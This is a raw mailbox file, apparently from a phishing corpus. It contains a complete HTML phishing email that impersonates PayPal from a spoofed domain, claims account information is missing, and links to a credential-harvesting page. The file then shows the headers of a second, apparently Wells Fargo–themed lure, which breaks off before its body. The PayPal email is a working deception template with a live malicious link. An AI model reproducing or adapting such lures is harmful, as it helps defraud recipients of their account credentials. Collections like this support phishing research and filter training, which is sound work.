From: "Paypal"<noreply@Service-pp.com>
Subject: Important update required.
Date: Sun, 29 Jan 2017 09:04:10 +0200
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - rose.superdnssite.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - Service-pp.com
X-Get-Message-Sender-Via: rose.superdnssite.com: authenticated_id: admin@jerkyemporium.com
X-Authenticated-Sender: rose.superdnssite.com: admin@jerkyemporium.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 37


<meta charset="utf-8">
<center>
<font style="font-size: 40px;font-style: italic;font-weight: bold;font-family: tahoma,geneva,sans-serif;color: #003366;">Pay</font>
<font style="font-size: 40px;font-style: italic;font-weight: bold;font-family: tahoma,geneva,sans-serif;color: #009cde;">Pal</font>
<br>
<br>
<div style="border: 1px solid #efe9e9;width: 650px;text-align: center;padding: 2px;">
<h4>
<font color="#019be1">Notice of Policy Updates</font></h4>
paypal Client,
<br>
<br>
Some information  missing or incorrect.
<br>
Please update your information promptly
<br>
<h5>
<a href="http://webgensolutions.net/.web/websecurity/secure/updaterequried/unrecognized/importantsecurity/pp/updatenow/securityforpp/pp/security/Signin/home/login?cmd=_signin&dispatch=34c20084b77c44278e1890e69&locale=en_EG">Click Here To Check your Account</a>
</h5>
</div>
<br>
Copyright  1999-2016 PayPaI, Inc. All Right Reserved.
</center>

From jose@monkey.org Sun Jan 29 12:57:08 2017 +0000
Return-Path: gerdon@mwt.net
Delivered-To: jose@monkey.org
X-FDA: 72457136136.23.teeth73_5b5ce01712005
X-Spam-Summary: 57,3.5,0,030e5aac907d1586,d41d8cd98f00b204,gerdon@mwt.net,:gerdon@mwt.net,RULES_HIT:41:379:677:871:973:978:988:989:1254:1260:1313:1314:1319:1325:1381:1437:1516:1517:1518:1538:1575:1594:1699:1711:1714:1730:1747:1764:1777:1792:2107:2145:2194:2199:2393:2539:2549:2568:2741:2890:2892:2900:2926:3138:3139:3140:3141:3142:3350:3619:3865:3866:3867:3868:3870:3873:3976:4042:4310:4362:4365:4427:5007:6227:6261:6687:6748:7281:7398:7652:7907:8829:9010:10013:10265:10394:10400:11604:11658:11914:12291:12295:12517:12519:12561:12679:13019:13116:13132:13161:13229:13231:13439:14346:14686:14828:21080:21450:30001:30004:30005:30007:30009:30014:30019:30025:30026:30028:30029:30034:30037:30038:30045:30046:30052:30054:30055:30062:30064:30069:30070:30075:30080:30089:30090:30091,0,RBL:95.142.155.65:@mwt.net:.lbl8.mailshell.net-62.16.73.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fu,MSBL:0,DNSBL:none,Custom_rules:0:5:0,LFtime:8,LUA_SUMMARY:none
X-HE-Tag: teeth73_5b5ce01712005
X-Filterd-Recvd-Size: 52698
Received: from mail7-westhall.footholds.net (mail7-westhall.footholds.net [95.142.155.65])
	by imf01.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun, 29 Jan 2017 12:57:07 +0000 (UTC)
Received: from [46.20.35.112] (port=50607 helo=VM-WIN2K8-1563.appvz-dhcp)
	by westhall.footholds.net with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.87)
	(envelope-from <gerdon@mwt.net>)
	id 1cXp1s-00400P-Ui; Sun, 29 Jan 2017 12:56:28 +0000
Content-Type: multipart/mixed; boundary="===============1543042520=="
MIME-Version: 1.0
Subject: Wells Fargo Bill Pay: Payee'(s) Added.
To: Recipients <gerdon@mwt.net>
